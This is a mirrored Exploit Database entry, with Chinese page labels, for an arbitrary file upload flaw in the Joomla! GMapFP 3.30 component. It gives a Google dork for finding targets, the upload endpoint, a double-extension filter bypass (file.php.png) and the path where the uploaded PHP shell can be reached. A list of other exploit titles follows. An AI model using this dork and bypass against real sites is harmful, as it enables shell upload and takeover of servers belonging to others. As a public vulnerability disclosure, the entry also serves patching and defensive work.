Joomla! Component GMapFP 3.30 – Arbitrary File Upload

Exploit Database
88 阅读

作者： ThelastVvV

日期： 2020-03-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48248/

# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
# Google Dork: inurl:''com_gmapfp''
# Date: 2020-03-25
# Exploit Author: ThelastVvV
# Vendor Homepage:https://gmapfp.org/
# Version:* Version J3.30pro
# Tested on: Ubuntu

# PoC:

http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image

# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg 

# Dir File Path:

http://127.0.0.1/images/gmapfp/file.php 

or

http://127.0.0.1//images/gmapfp/file.php.png

# The JoomlaGmapfp Components 3.x is allowing
# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads

last Exploits
Joomla! Component GMapFP 3.30 – Arbitrary File Upload的更多信息

StivaSoft Stiva SHOPPING CART 1.0 – ‘demo.php’ Cross-Site Scripting：
FileRun < 2017.09.18 - SQL Injection：
MediaAccess TG788vn – File Disclosure：
WordPress Plugin Picture Gallery 1.4.2 – ‘Edit Content URL’ Stored Cross-Site Scripting (XSS)：
WordPress Plugin PicUploader 1.0 – Remote File Upload：
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting：
Kmaleon 1.1.0.205 – ‘tipocomb’ SQL Injection (Authenticated)：
J.A.G (Just Another Guestbook) 1.14 – Database Disclosure：